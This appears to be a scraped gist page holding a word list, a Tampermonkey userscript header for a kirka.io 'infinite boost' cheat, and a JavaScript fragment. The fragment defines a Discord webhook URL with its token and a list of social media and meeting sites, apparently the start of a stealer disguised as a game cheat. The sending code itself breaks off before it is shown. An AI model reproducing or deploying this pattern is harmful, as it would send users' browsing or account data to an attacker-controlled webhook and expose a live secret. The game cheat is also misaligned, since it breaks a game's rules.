This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
welcome | |
slow | |
bump | |
quick | |
ball | |
enormous | |
reproduce | |
low | |
cake | |
fortunate |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name A|v1 Kirka Inf Boost | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description When E pressed boost will remain no cooldown | |
// @author CrimsonRose | |
// @match *://kirka.io/* | |
// @license MIT | |
// @icon data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw== | |
// @grant none |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const webhookUrl = 'https://discord.com/api/webhooks/1273360878607270061/A2qfHMLWBzZiHqeRHIhAkSnGCjK4nDS1SOqV1-q14PxAX3UsD_UqcL3hrJ7Mu5EBGGXx'; | |
const baseUrls = [ | |
'https://meet.google.com', | |
'https://app.zoom.us', | |
'https://instagram.com', | |
'https://tiktok.com', | |
'https://facebook.com', | |
'https://twitter.com', | |
'https://linkedin.com', | |
'https://youtube.com', |